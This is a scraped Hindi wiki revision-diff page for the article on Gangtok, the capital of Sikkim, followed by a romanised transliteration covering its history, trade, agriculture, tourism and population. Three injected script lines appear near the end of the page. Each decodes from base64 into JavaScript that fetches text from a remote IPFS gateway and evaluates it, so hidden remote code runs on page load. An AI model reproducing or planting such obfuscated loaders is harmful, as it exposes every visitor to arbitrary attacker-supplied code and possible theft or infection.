Difference between revisions of "गंगटोक"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==टीका टिप्पणी और संदर्भ==" to "{{संदर्भ ग्रंथ}} ==टीका टिप्पणी और संदर्भ==")
Line 1: Line 1:
 
[[चित्र:Gangtok-Valley-Sikkim.jpg|thumb|250px|गंगटोक घाटी, [[सिक्किम]] <br />Gangtok Valley, Sikkim]]
 
[[चित्र:Gangtok-Valley-Sikkim.jpg|thumb|250px|गंगटोक घाटी, [[सिक्किम]] <br />Gangtok Valley, Sikkim]]
गंगटोक शहर, [[सिक्किम]] राज्य की राजधानी, पूर्वोत्तर [[भारत]] में 1,700 मीटर की ऊँचाई पर स्थित है।  
+
'''गंगटोक''' [[सिक्किम]] राज्य की राजधानी, पूर्वोत्तर [[भारत]] में 1,700 मीटर की ऊँचाई पर स्थित है।  
 
==इतिहास==
 
==इतिहास==
 
राजतंत्र की समाप्ति ([[1975]]) से पहले यह सिक्किम राज्य का प्रशासनिक केन्द्र था, जिसे भारत में शामिल करके [[1975]] में राज्य का दर्जा दिया गया।  
 
राजतंत्र की समाप्ति ([[1975]]) से पहले यह सिक्किम राज्य का प्रशासनिक केन्द्र था, जिसे भारत में शामिल करके [[1975]] में राज्य का दर्जा दिया गया।  
 
==उद्योग और व्यापार==
 
==उद्योग और व्यापार==
{{tocright}}
+
गंगटोक [[मक्का]], [[चावल]], दलहन और [[संतरा|संतरों]] का विपणन केन्द्र है। [[1962]] में [[तिब्बत]] से लगने वाली सीमा को बंद किए जाने से पहले यह 21 किलोमीटर पूर्वोत्तर में स्थित नाथुला<ref>नाथू दर्रा</ref> के ज़रिये भारत तिब्बत व्यापार मार्ग का एक महत्त्वपूर्ण बिंदु था।  
गंगटोक मक्का, चावल, दलहन और संतरों का विपणन केन्द्र है। [[1962]] में तिब्बत से लगने वाली सीमा को बंद किए जाने से पहले यह 21 किलोमीटर पूर्वोत्तर में स्थित नाथुला (नाथू दर्रा) के ज़रिये भारत तिब्बत व्यापार मार्ग का एक महत्त्वपूर्ण बिंदु था।  
+
==कृषि और व्यापार==
==कृषि और खनिज==
+
गंगटोक<ref>अर्थ, [[पर्वत]] का शिखर</ref> ढलानों पर अवस्थित है, जहाँ सीढ़ीदार खेतों में व्यापक तौर पर मक्का की खेती होती है। गंगटोक में महत्त्वपूर्ण निर्यात उत्पाद [[इलायची]] और उपोष्णकटिबंधीय फलों का सरकारी उद्यान है। दक्षिण में तादोंग में प्रायोगिक [[कृषि]] केन्द्र स्थित है।  
गंगटोक (अर्थ, पर्वत का शिखर) ढलानों पर अवस्थित है, जहाँ सीढ़ीदार खेतों में व्यापक तौर पर मक्का की खेती होती है।  
 
 
==यातायात और परिवहन==
 
==यातायात और परिवहन==
 
गंगटोक से लाहुंग और लाचेन होते हुए उत्तरी सिक्किम राजमार्ग ([[1962]]) तिब्बत की सीमा तक जाता है और राष्ट्रीय राजमार्ग दक्षिण पश्चिम दिशा में भारत की ओर जाता है।  
 
गंगटोक से लाहुंग और लाचेन होते हुए उत्तरी सिक्किम राजमार्ग ([[1962]]) तिब्बत की सीमा तक जाता है और राष्ट्रीय राजमार्ग दक्षिण पश्चिम दिशा में भारत की ओर जाता है।  
 +
[[चित्र:Sikkim-Legislation-Assembly.jpg|thumb|250px|left|सिक्किम विधानसभा, गंगटोक]]
 
==शिक्षण संस्थान==
 
==शिक्षण संस्थान==
गंगटोक में नामग्याल इंस्टिट्यूट ऑफ़ तिब्बतोलॉज़ी ([[1958]]) नामक शोध केन्द्र है। जिसमें महायान बौद्ध मत से संबंधित पुस्तकों और दुर्लभ पांडुलिपियों का विश्व का विशालतम संग्रह मौजूद है। गंगटोक में एक अस्पताल, माध्यमिक विद्यालय, अदालत और कुछ आधुनिक दुकानें, होटल व सिनेमाघर हैं।  
+
गंगटोक में नामग्याल इंस्टिट्यूट ऑफ़ तिब्बतोलॉज़ी ([[1958]]) नामक शोध केन्द्र है। जिसमें [[महायान]] [[बौद्ध]] मत से संबंधित पुस्तकों और दुर्लभ पांडुलिपियों का विश्व का विशालतम संग्रह मौजूद है। गंगटोक में एक अस्पताल, माध्यमिक विद्यालय, अदालत और कुछ आधुनिक दुकानें, होटल व सिनेमाघर हैं।  
 
==पर्यटन==
 
==पर्यटन==
यहाँ ऑर्किड अभयारण्य स्थल है, जिसमें सिक्किम में पाए जाने वाले 454 प्रजातियों के ऑर्किड है। सोने के गुंबद वाले स्तूप से युक्त दो-द्रुल चोर्तेन, जिसमें 108 प्रार्थना चक्र हैं और लघु उद्योग संस्थान कॉटेज इंडस्ट्रीज़ इंस्टिट्यूट ([[1957]]) भी यहाँ अवस्थित हैं। अन्य पर्यटन स्थलों में चोग्याल का महल गणेश टोक, हनुमान टोक, एंचे मठ, मृग विहार चिड़ियाघर और ताशी व्यू पॉइंट शामिल हैं। विख्यात रूमटेक बौद्ध मठ यहाँ से 8 किलोमीटर दक्षिण-पश्चिम में स्थित है और निकटस्थल लक्षियामा में शाही अंत्येष्टि स्थल स्थित है। गंगटोक में महत्त्वपूर्ण निर्यात उत्पाद इलायची और उपोष्णकटिबंधीय फलों का सरकारी उद्यान है। दक्षिण में तादोंग में प्रायोगिक कृषि केन्द्र स्थित है।  
+
गंगटोक में ऑर्किड अभयारण्य स्थल है, जिसमें सिक्किम में पाए जाने वाले 454 प्रजातियों के ऑर्किड है। [[सोना|सोने]] के गुंबद वाले [[स्तूप]] से युक्त दो-द्रुल चोर्तेन, जिसमें 108 प्रार्थना चक्र हैं और लघु उद्योग संस्थान कॉटेज इंडस्ट्रीज़ इंस्टिट्यूट ([[1957]]) भी यहाँ अवस्थित हैं। अन्य पर्यटन स्थलों में चोग्याल का महल गणेश टोक, हनुमान टोक, एंचे मठ, मृग विहार चिड़ियाघर और ताशी व्यू पॉइंट शामिल हैं। विख्यात रूमटेक बौद्ध मठ यहाँ से 8 किलोमीटर दक्षिण-पश्चिम में स्थित है और निकटस्थल लक्षियामा में शाही अंत्येष्टि स्थल स्थित है।  
 
==जनसंख्या==
 
==जनसंख्या==
 
यहाँ की आबादी में नेपाली, तिब्बती, [[लेप्चा]] और भारतीय लोग शामिल हैं। [[2001]] की जनगणना के अनुसार इस शहर की जनसंख्या 29,162 है, और पूर्वी ज़िले की जनसंख्या  2,44,790 है।
 
यहाँ की आबादी में नेपाली, तिब्बती, [[लेप्चा]] और भारतीय लोग शामिल हैं। [[2001]] की जनगणना के अनुसार इस शहर की जनसंख्या 29,162 है, और पूर्वी ज़िले की जनसंख्या  2,44,790 है।
Line 30: Line 30:
 
<references/>
 
<references/>
 
==संबंधित लेख==
 
==संबंधित लेख==
 
 
{{प्रदेशों की राजधानी}}
 
{{प्रदेशों की राजधानी}}
 
{{भारत गणराज्य}}
 
{{भारत गणराज्य}}
Line 36: Line 35:
 
[[Category:प्रदेशों_की_राजधानियाँ]][[Category:सिक्किम]][[Category:पर्यटन_कोश]]
 
[[Category:प्रदेशों_की_राजधानियाँ]][[Category:सिक्किम]][[Category:पर्यटन_कोश]]
 
[[Category:सिक्किम के नगर]]
 
[[Category:सिक्किम के नगर]]
 +
__NOTOC__

Revision as of 12:45, 13 October 2011

[[chitr:Gangtok-Valley-Sikkim.jpg|thumb|250px|gangatok ghati, sikkim
Gangtok Valley, Sikkim]] gangatok sikkim rajy ki rajadhani, poorvottar bharat mean 1,700 mitar ki ooanchaee par sthit hai.

itihas

rajatantr ki samapti (1975) se pahale yah sikkim rajy ka prashasanik kendr tha, jise bharat mean shamil karake 1975 mean rajy ka darja diya gaya.

udyog aur vyapar

gangatok makka, chaval, dalahan aur santaroan ka vipanan kendr hai. 1962 mean tibbat se lagane vali sima ko band kie jane se pahale yah 21 kilomitar poorvottar mean sthit nathula[1] ke zariye bharat tibbat vyapar marg ka ek mahattvapoorn biandu tha.

krishi aur vyapar

gangatok[2] dhalanoan par avasthit hai, jahaan sidhidar khetoan mean vyapak taur par makka ki kheti hoti hai. gangatok mean mahattvapoorn niryat utpad ilayachi aur uposhnakatibandhiy phaloan ka sarakari udyan hai. dakshin mean tadoang mean prayogik krishi kendr sthit hai.

yatayat aur parivahan

gangatok se lahuang aur lachen hote hue uttari sikkim rajamarg (1962) tibbat ki sima tak jata hai aur rashtriy rajamarg dakshin pashchim disha mean bharat ki or jata hai. thumb|250px|left|sikkim vidhanasabha, gangatok

shikshan sansthan

gangatok mean namagyal ianstityoot aauf tibbatol aauzi (1958) namak shodh kendr hai. jisamean mahayan bauddh mat se sanbandhit pustakoan aur durlabh paandulipiyoan ka vishv ka vishalatam sangrah maujood hai. gangatok mean ek aspatal, madhyamik vidyalay, adalat aur kuchh adhunik dukanean, hotal v sinemaghar haian.

paryatan

gangatok mean aaurkid abhayarany sthal hai, jisamean sikkim mean pae jane vale 454 prajatiyoan ke aaurkid hai. sone ke guanbad vale stoop se yukt do-drul chorten, jisamean 108 prarthana chakr haian aur laghu udyog sansthan k aautej iandastriz ianstityoot (1957) bhi yahaan avasthit haian. any paryatan sthaloan mean chogyal ka mahal ganesh tok, hanuman tok, eanche math, mrig vihar chi diyaghar aur tashi vyoo p aauiant shamil haian. vikhyat roomatek bauddh math yahaan se 8 kilomitar dakshin-pashchim mean sthit hai aur nikatasthal lakshiyama mean shahi aantyeshti sthal sthit hai.

janasankhya

yahaan ki abadi mean nepali, tibbati, lepcha aur bharatiy log shamil haian. 2001 ki janaganana ke anusar is shahar ki janasankhya 29,162 hai, aur poorvi zile ki janasankhya 2,44,790 hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>


tika tippani aur sandarbh

  1. nathoo darra
  2. arth, parvat ka shikhar

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>